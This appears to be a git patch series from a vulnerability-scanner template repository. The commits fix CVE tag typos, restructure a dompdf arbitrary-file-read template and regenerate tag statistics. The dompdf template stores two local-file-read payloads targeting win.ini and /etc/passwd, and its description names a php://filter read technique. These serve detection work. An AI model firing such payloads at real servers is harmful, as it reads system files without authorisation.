- type: word From ff1537d7da1c1b3591209c9c984dfabbb5ef63a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 15:43:08 +0530 Subject: [PATCH 2455/4083] fixing tags typos --- cves/2016/CVE-2016-6277.yaml | 2 +- cves/2016/CVE-2016-8527.yaml | 2 +- cves/2019/CVE-2019-13392.yaml | 2 +- cves/2019/CVE-2019-7543.yaml | 2 +- cves/2020/CVE-2020-24912.yaml | 2 +- cves/2020/CVE-2020-28351.yaml | 2 +- cves/2021/CVE-2021-24342.yaml | 2 +- cves/2021/CVE-2021-35265.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index fddddf2586..fd2ae09625 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce,iot + tags: cve,cve2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index efc62d3bd6..69e67cefdf 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 - tags: cves,cve2016,aruba,xss + tags: cve,cve2016,aruba,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index 2bc429135d..510ebbf552 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.doyler.net/security-not-included/natemail-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 - tags: cves,cve2019,natemail,xss + tags: cve,cve2019,natemail,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index 4ce8628577..fd87d15c32 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 - tags: cves,cve2019,kindeditor,xss + tags: cve,cve2019,kindeditor,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index d4d917d90d..aacac10ef1 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -9,7 +9,7 @@ info: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 - tags: cves,cve2020,qcubed,xss + tags: cve,cve2020,qcubed,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index 11a660996c..62ede841c5 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 - tags: cves,cve2020,shoretel,xss + tags: cve,cve2020,shoretel,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index dccaee5040..3bfe0d645b 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 - tags: cves,cve2021,wordpress,xss,wp-plugin + tags: cve,cve2021,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index 5217c1c155..aebcb7782d 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 - tags: cves,cve2021,maxsite,xss + tags: cve,cve2021,maxsite,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 From bcb594fc56bced7b33a40dce7db9cb08bb147d79 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 15:46:26 +0530 Subject: [PATCH 2456/4083] more updates --- cves/2014/CVE-2014-2383.yaml | 10 +++++----- cves/2014/CVE-2014-9094.yaml | 5 ++--- 2 files changed, 7 insertions(+), 8 deletions(-) diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 7607410c38..07726343d2 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -1,14 +1,14 @@ -id: arbitrary-file-read-in-dompdf +id: CVE-2014-2383 info: name: Arbitrary file read in dompdf < v0.6.0 author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/33004 - tags: dompdf,lfi - -# - "/dompdf.php?input_file=C:/windows/win.ini" -# - "/dompdf.php?input_file=/etc/passwd" + tags: cve,cve2014,dompdf,lfi + metadata: + win-payload: "/dompdf.php?input_file=C:/windows/win.ini" + unix-payload: "/dompdf.php?input_file=/etc/passwd" requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 12b29d2090..8e73d7da9b 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -4,9 +4,9 @@ info: name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin requests: - method: GET @@ -18,7 +18,6 @@ requests: - type: word words: - "" - part: body - type: word part: header From 5fa06f52e12c2879f3feec1bad32f5cfe6e2cd70 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 10:20:38 +0000 Subject: [PATCH 2457/4083] Auto Generated CVE annotations [Tue Sep 21 10:20:38 UTC 2021] :robot: --- cves/2014/CVE-2014-2383.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 07726343d2..fd3eca9e6a 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -9,6 +9,7 @@ info: metadata: win-payload: "/dompdf.php?input_file=C:/windows/win.ini" unix-payload: "/dompdf.php?input_file=/etc/passwd" + description: "dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter." requests: - method: GET From 0e1b69f527e5fc75f7f8cf197e86754e3bf51ce7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 21 Sep 2021 10:35:50 +0000 Subject: [PATCH 2458/4083] Auto Generated Templates Stats [Tue Sep 21 10:35:50 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1596 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 813 insertions(+), 805 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 9d08e2481a..1ddab0704d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":702},{"name":"lfi","count":253},{"name":"panel","count":248},{"name":"xss","count":240},{"name":"exposure","count":228},{"name":"wordpress","count":212},{"name":"rce","count":197},{"name":"tech","count":173},{"name":"cve2020","count":162},{"name":"wp-plugin","count":143},{"name":"cve2021","count":123},{"name":"cve2019","count":95},{"name":"config","count":93},{"name":"cve2018","count":83},{"name":"joomla","count":77},{"name":"apache","count":69},{"name":"takeover","count":67},{"name":"cve2010","count":67},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":52},{"name":"cve2017","count":49},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"oracle","count":36},{"name":"ssrf","count":36},{"name":"","count":36},{"name":"cve2016","count":34},{"name":"redirect","count":30},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":21},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"router","count":19},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"cve2014","count":16},{"name":"misconfig","count":15},{"name":"weblogic","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"php","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"adobe","count":13},{"name":"zoho","count":13},{"name":"fuzz","count":13},{"name":"devops","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"aws","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"intrusive","count":8},{"name":"cnvd","count":8},{"name":"wp-theme","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"cves","count":7},{"name":"google","count":7},{"name":"confluence","count":7},{"name":"microsoft","count":7},{"name":"cve2009","count":7},{"name":"vmware","count":7},{"name":"cms","count":7},{"name":"ibm","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"solr","count":6},{"name":"django","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"citrix","count":6},{"name":"headless","count":5},{"name":"fileupload","count":5},{"name":"dedecms","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"nodejs","count":5},{"name":"printer","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"samsung","count":4},{"name":"moodle","count":4},{"name":"hp","count":4},{"name":"symfony","count":4},{"name":"zimbra","count":4},{"name":"thinkcmf","count":4},{"name":"asp","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"artifactory","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"vpn","count":4},{"name":"resin","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"symantec","count":4},{"name":"proxy","count":4},{"name":"crlf","count":4},{"name":"firmware","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"glpi","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"camera","count":3},{"name":"caucho","count":3},{"name":"zhiyuan","count":3},{"name":"tikiwiki","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"npm","count":3},{"name":"openssh","count":3},{"name":"smtp","count":3},{"name":"zabbix","count":3},{"name":"microstrategy","count":3},{"name":"lfr","count":3},{"name":"druid","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"nacos","count":3},{"name":"prometheus","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"nexus","count":3},{"name":"cacti","count":3},{"name":"targa","count":3},{"name":"kibana","count":3},{"name":"log","count":3},{"name":"bigip","count":3},{"name":"itop","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"openam","count":3},{"name":"git","count":3},{"name":"springcloud","count":3},{"name":"firebase","count":3},{"name":"fpd","count":3},{"name":"mongodb","count":3},{"name":"hoteldruid","count":3},{"name":"kevinlab","count":3},{"name":"opensis","count":3},{"name":"ofbiz","count":3},{"name":"injection","count":3},{"name":"mail","count":3},{"name":"httpd","count":3},{"name":"telerik","count":3},{"name":"kafka","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"linkerd","count":3},{"name":"hashicorp","count":2},{"name":"harbor","count":2},{"name":"cve2005","count":2},{"name":"chamilo","count":2},{"name":"avantfax","count":2},{"name":"akkadian","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"icewarp","count":2},{"name":"fortios","count":2},{"name":"service","count":2},{"name":"ec2","count":2},{"name":"azure","count":2},{"name":"axis2","count":2},{"name":"globalprotect","count":2},{"name":"netis","count":2},{"name":"nextcloud","count":2},{"name":"couchdb","count":2},{"name":"spark","count":2},{"name":"mcafee","count":2},{"name":"hjtcloud","count":2},{"name":"emerge","count":2},{"name":"wordfence","count":2},{"name":"node","count":2},{"name":"qcubed","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"huawei","count":2},{"name":"nextjs","count":2},{"name":"totemomail","count":2},{"name":"dolibarr","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"bruteforce","count":2},{"name":"hasura","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"cve2007","count":2},{"name":"netsweeper","count":2},{"name":"glassfish","count":2},{"name":"favicon","count":2},{"name":"akamai","count":2},{"name":"nagios","count":2},{"name":"paloalto","count":2},{"name":"idrac","count":2},{"name":"getsimple","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"hostheader-injection","count":2},{"name":"mida","count":2},{"name":"dos","count":2},{"name":"igs","count":2},{"name":"sharepoint","count":2},{"name":"kentico","count":2},{"name":"status","count":2},{"name":"adminer","count":2},{"name":"github","count":2},{"name":"plesk","count":2},{"name":"webcam","count":2},{"name":"pega","count":2},{"name":"xxljob","count":2},{"name":"frp","count":2},{"name":"axis","count":2},{"name":"db","count":2},{"name":"horde","count":2},{"name":"geowebserver","count":2},{"name":"phpcollab","count":2},{"name":"jeedom","count":2},{"name":"ecology","count":2},{"name":"storage","count":2},{"name":"prestashop","count":2},{"name":"kong","count":2},{"name":"ucmdb","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"smb","count":2},{"name":"prtg","count":2},{"name":"chiyu","count":2},{"name":"liferay","count":2},{"name":"odoo","count":2},{"name":"keycloak","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"minio","count":2},{"name":"splunk","count":2},{"name":"sonicwall","count":2},{"name":"grav","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"aruba","count":2},{"name":"seeyon","count":2},{"name":"bucket","count":2},{"name":"jsf","count":2},{"name":"voipmonitor","count":2},{"name":"middleware","count":2},{"name":"rockethchat","count":2},{"name":"yii","count":2},{"name":"guacamole","count":2},{"name":"backdoor","count":2},{"name":"trixbox","count":2},{"name":"clockwork","count":1},{"name":"shopizer","count":1},{"name":"graylog","count":1},{"name":"api-manager","count":1},{"name":"turbocrm","count":1},{"name":"linksys","count":1},{"name":"socomec","count":1},{"name":"embedthis","count":1},{"name":"nsasg","count":1},{"name":"plugin","count":1},{"name":"kubeflow","count":1},{"name":"hadoop","count":1},{"name":"metabase","count":1},{"name":"basic-auth","count":1},{"name":"manageengine","count":1},{"name":"razor","count":1},{"name":"ilo4","count":1},{"name":"javafaces","count":1},{"name":"exposures","count":1},{"name":"netdata","count":1},{"name":"realteo","count":1},{"name":"wiki","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"cockpit","count":1},{"name":"nette","count":1},{"name":"node-red-dashboard","count":1},{"name":"blue-ocean","count":1},{"name":"wuzhicms","count":1},{"name":"seacms","count":1},{"name":"tidb","count":1},{"name":"apos","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"addpac","count":1},{"name":"stem","count":1},{"name":"ioncube","count":1},{"name":"chyrp","count":1},{"name":"rmi","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"shopware","count":1},{"name":"gunicorn","count":1},{"name":"powercreator","count":1},{"name":"ognl","count":1},{"name":"servicenow","count":1},{"name":"jnoj","count":1},{"name":"kindeditor","count":1},{"name":"wmt","count":1},{"name":"mantisbt","count":1},{"name":"bash","count":1},{"name":"linux","count":1},{"name":"omi","count":1},{"name":"tieline","count":1},{"name":"nimble","count":1},{"name":"cocoon","count":1},{"name":"openrestry","count":1},{"name":"varnish","count":1},{"name":"h3c-imc","count":1},{"name":"cofax","count":1},{"name":"synnefo","count":1},{"name":"acme","count":1},{"name":"landray","count":1},{"name":"enum","count":1},{"name":"apiman","count":1},{"name":"cse","count":1},{"name":"sangfor","count":1},{"name":"opensns","count":1},{"name":" default-login","count":1},{"name":"miscrsoft","count":1},{"name":"enumeration","count":1},{"name":"nc2","count":1},{"name":"blackboard","count":1},{"name":"csrf","count":1},{"name":"zzzcms","count":1},{"name":"plone","count":1},{"name":"gespage","count":1},{"name":"announcekit","count":1},{"name":"fortilogger","count":1},{"name":"htmli","count":1},{"name":"jitsi","count":1},{"name":"viewlinc","count":1},{"name":"asus","count":1},{"name":"influxdb","count":1},{"name":"webmin","count":1},{"name":"tectuus","count":1},{"name":"redwood","count":1},{"name":"zend","count":1},{"name":"redhat","count":1},{"name":"rmc","count":1},{"name":"solman","count":1},{"name":"xff","count":1},{"name":"gogs","count":1},{"name":"terraform","count":1},{"name":"circontrol","count":1},{"name":"cobub","count":1},{"name":"websphere","count":1},{"name":"cgi","count":1},{"name":"bullwark","count":1},{"name":"aura","count":1},{"name":"smartblog","count":1},{"name":"saltapi","count":1},{"name":"expressjs","count":1},{"name":"csod","count":1},{"name":"cloudflare","count":1},{"name":"lancom","count":1},{"name":"keenetic","count":1},{"name":"pagespeed","count":1},{"name":"aspnuke","count":1},{"name":"s3","count":1},{"name":"scimono","count":1},{"name":"graphite","count":1},{"name":"openvpn","count":1},{"name":"woocomernce","count":1},{"name":"spip","count":1},{"name":"natemail","count":1},{"name":"elfinder","count":1},{"name":"sprintful","count":1},{"name":"appweb","count":1},{"name":"metinfo","count":1},{"name":"zmanda","count":1},{"name":"servicedesk","count":1},{"name":"emc","count":1},{"name":"tongda","count":1},{"name":"bitly","count":1},{"name":"netgenie","count":1},{"name":"szhe","count":1},{"name":"mongo","count":1},{"name":"ueditor","count":1},{"name":"yachtcontrol","count":1},{"name":"faraday","count":1},{"name":"redmine","count":1},{"name":"jsp","count":1},{"name":"phpwiki","count":1},{"name":"gstorage","count":1},{"name":"sceditor","count":1},{"name":"whm","count":1},{"name":"dotnet","count":1},{"name":"netmask","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"webadmin","count":1},{"name":"tapestry","count":1},{"name":"episerver","count":1},{"name":"jfrog","count":1},{"name":"monitorix","count":1},{"name":"pmb","count":1},{"name":"ghost","count":1},{"name":"2014","count":1},{"name":"processmaker","count":1},{"name":"ecom","count":1},{"name":"burp","count":1},{"name":"ssl","count":1},{"name":"oscommerce","count":1},{"name":"logontracer","count":1},{"name":"magicflow","count":1},{"name":"empirecms","count":1},{"name":"azkaban","count":1},{"name":"drone","count":1},{"name":"oneblog","count":1},{"name":"shiro","count":1},{"name":"subrion","count":1},{"name":"simplecrm","count":1},{"name":"swagger","count":1},{"name":"adb","count":1},{"name":"javamelody","count":1},{"name":"werkzeug","count":1},{"name":"clockwatch","count":1},{"name":"tamronos","count":1},{"name":"exacqvision","count":1},{"name":"heroku","count":1},{"name":"octoprint","count":1},{"name":"st","count":1},{"name":"linkedin","count":1},{"name":"redcap","count":1},{"name":"pyramid","count":1},{"name":"alibaba","count":1},{"name":"pcoip","count":1},{"name":"dvwa","count":1},{"name":"xunchi","count":1},{"name":"rdp","count":1},{"name":"zte","count":1},{"name":"xml","count":1},{"name":"selea","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"moinmoin","count":1},{"name":"achecker","count":1},{"name":"smartsense","count":1},{"name":"pacsone","count":1},{"name":"fortigate","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"sco","count":1},{"name":"clink-office","count":1},{"name":"bazarr","count":1},{"name":"pippoint","count":1},{"name":"lotus","count":1},{"name":"ruby","count":1},{"name":"wavemaker","count":1},{"name":"nuuo","count":1},{"name":"sophos","count":1},{"name":"webftp","count":1},{"name":"ntopng","count":1},{"name":"hiawatha","count":1},{"name":"graphql","count":1},{"name":"cors","count":1},{"name":"avtech","count":1},{"name":"alerta","count":1},{"name":"soar","count":1},{"name":"visualtools","count":1},{"name":"gotmls","count":1},{"name":"ems","count":1},{"name":"clave","count":1},{"name":"domxss","count":1},{"name":"gitea","count":1},{"name":"tcexam","count":1},{"name":"listserv","count":1},{"name":"sitecore","count":1},{"name":"vnc","count":1},{"name":"esmtp","count":1},{"name":"openerp","count":1},{"name":"krweb","count":1},{"name":"hiboss","count":1},{"name":"solarlog","count":1},{"name":"owa","count":1},{"name":"mirai","count":1},{"name":"weiphp","count":1},{"name":"oidc","count":1},{"name":"labtech","count":1},{"name":"wildfly","count":1},{"name":"moin","count":1},{"name":"maxsite","count":1},{"name":"lanproxy","count":1},{"name":"triconsole","count":1},{"name":"jenzabar","count":1},{"name":"trane","count":1},{"name":"phpfastcache","count":1},{"name":"mpsec","count":1},{"name":"yealink","count":1},{"name":"maccmsv10","count":1},{"name":"cves2016","count":1},{"name":"eyelock","count":1},{"name":"mdb","count":1},{"name":"dvr","count":1},{"name":"k8s","count":1},{"name":"myvuehelp","count":1},{"name":"biometrics","count":1},{"name":"jeewms","count":1},{"name":"livezilla","count":1},{"name":"goahead","count":1},{"name":"mobileiron","count":1},{"name":"calendarix","count":1},{"name":"qvisdvr","count":1},{"name":"svnserve","count":1},{"name":"smi","count":1},{"name":"zyxel","count":1},{"name":"sar2html","count":1},{"name":"plc","count":1},{"name":"sidekiq","count":1},{"name":"qsan","count":1},{"name":"ruckus","count":1},{"name":"discord","count":1},{"name":"starttls","count":1},{"name":"haproxy","count":1},{"name":"accela","count":1},{"name":"sentry","count":1},{"name":"fedora","count":1},{"name":"centreon","count":1},{"name":"interlib","count":1},{"name":"huijietong","count":1},{"name":"k8","count":1},{"name":"acexy","count":1},{"name":"majordomo2","count":1},{"name":"dompdf","count":1},{"name":"cherokee","count":1},{"name":"auth","count":1},{"name":"mantis","count":1},{"name":"exponentcms","count":1},{"name":"eyou","count":1},{"name":"fortigates","count":1},{"name":"karel","count":1},{"name":"bookstack","count":1},{"name":"nps","count":1},{"name":"ssltls","count":1},{"name":"codemeter","count":1},{"name":"sage","count":1},{"name":"rfi","count":1},{"name":"spidercontrol","count":1},{"name":"sqlite","count":1},{"name":"cve2006","count":1},{"name":"cyberoam","count":1},{"name":"pgadmin","count":1},{"name":"fastcgi","count":1},{"name":"openx","count":1},{"name":"arl","count":1},{"name":"rsyncd","count":1},{"name":"emby","count":1},{"name":"etouch","count":1},{"name":"optiLink","count":1},{"name":"couchbase","count":1},{"name":"wing-ftp","count":1},{"name":"svn","count":1},{"name":"frontpage","count":1},{"name":"eg","count":1},{"name":"rujjie","count":1},{"name":"phpfusion","count":1},{"name":"landrayoa","count":1},{"name":"tika","count":1},{"name":"vsphere","count":1},{"name":"alertmanager","count":1},{"name":"ricoh","count":1},{"name":"geddy","count":1},{"name":"lighttpd","count":1},{"name":"fastapi","count":1},{"name":"codeigniter","count":1},{"name":"argussurveillance","count":1},{"name":"tjws","count":1},{"name":"fortiweb","count":1},{"name":"expose","count":1},{"name":"payara","count":1},{"name":"jmx","count":1},{"name":"camunda","count":1},{"name":"twitter-server","count":1},{"name":"memcached","count":1},{"name":"jenkin","count":1},{"name":"gloo","count":1},{"name":"tpshop","count":1},{"name":"kyan","count":1},{"name":"concrete","count":1},{"name":"circontrorl","count":1},{"name":"ns","count":1},{"name":"wavlink","count":1},{"name":"rabbitmq","count":1},{"name":"plastic","count":1},{"name":"dbeaver","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"nedi","count":1},{"name":"opm","count":1},{"name":"panos","count":1},{"name":"shoppable","count":1},{"name":"phalcon","count":1},{"name":"setup","count":1},{"name":"meraki","count":1},{"name":"webui","count":1},{"name":"skywalking","count":1},{"name":"redis","count":1},{"name":"office365","count":1},{"name":"erp-nc","count":1},{"name":"spectracom","count":1},{"name":"zookeeper","count":1},{"name":"extractor","count":1},{"name":"tor","count":1},{"name":"email","count":1},{"name":"xmlchart","count":1},{"name":"fortinet","count":1},{"name":"phpinfo","count":1},{"name":"dotnetnuke","count":1},{"name":"lotuscms","count":1},{"name":"wooyun","count":1},{"name":"craftcms","count":1},{"name":"wondercms","count":1},{"name":"tensorflow","count":1},{"name":"opensmtpd","count":1},{"name":"feifeicms","count":1},{"name":"74cms","count":1},{"name":"parentlink","count":1},{"name":"kafdrop","count":1},{"name":"mediumish","count":1},{"name":"webmodule-ee","count":1},{"name":"jaspersoft","count":1},{"name":"tileserver","count":1},{"name":"zm","count":1},{"name":"mongoshake","count":1},{"name":"b2evolution","count":1},{"name":"minimouse","count":1},{"name":"websvn","count":1},{"name":"discourse","count":1},{"name":"portainer","count":1},{"name":"sureline","count":1},{"name":"diris","count":1},{"name":"artica","count":1},{"name":"owasp","count":1},{"name":"dotclear","count":1},{"name":"acontent","count":1},{"name":"resourcespace","count":1},{"name":"bolt","count":1},{"name":"salesforce","count":1},{"name":"beanshell","count":1},{"name":"scs","count":1},{"name":"lg-nas","count":1},{"name":"perl","count":1},{"name":"anchorcms","count":1},{"name":"javascript","count":1},{"name":"actuator","count":1},{"name":"pihole","count":1},{"name":"iptime","count":1},{"name":"vscode","count":1},{"name":"primetek","count":1},{"name":"shopxo","count":1},{"name":"vsftpd","count":1},{"name":"sourcebans","count":1},{"name":"daybyday","count":1},{"name":"monitorr","count":1},{"name":"elascticsearch","count":1},{"name":"timesheet","count":1},{"name":"vidyo","count":1},{"name":"rhymix","count":1},{"name":"expn","count":1},{"name":"doh","count":1},{"name":"centos","count":1},{"name":"upnp","count":1},{"name":"spring","count":1},{"name":"ewebs","count":1},{"name":"darkstat","count":1},{"name":"mautic","count":1},{"name":"iceflow","count":1},{"name":"xiuno","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"shoretel","count":1},{"name":"wazuh","count":1},{"name":"fuelcms","count":1},{"name":"mariadb","count":1},{"name":"nweb2fax","count":1},{"name":"avalanche","count":1},{"name":"fiori","count":1},{"name":"upload","count":1},{"name":"opencast","count":1},{"name":"lansweeper","count":1},{"name":"ganglia","count":1},{"name":"hortonworks","count":1},{"name":"bedita","count":1},{"name":"openstack","count":1},{"name":"mara","count":1},{"name":"trilithic","count":1},{"name":"visionhub","count":1},{"name":"mailchimp","count":1},{"name":"checkpoint","count":1},{"name":"dnssec","count":1},{"name":"zenario","count":1},{"name":"gateone","count":1},{"name":"mrtg","count":1},{"name":"panabit","count":1},{"name":"lutron","count":1},{"name":"postmessage","count":1},{"name":"jquery","count":1},{"name":"froxlor","count":1},{"name":"totaljs","count":1},{"name":"zms","count":1},{"name":"uwsgi","count":1},{"name":"commscope","count":1},{"name":"wamp","count":1},{"name":"sgp","count":1},{"name":"floc","count":1},{"name":"default","count":1},{"name":"clickhouse","count":1},{"name":"wifisky","count":1},{"name":"idemi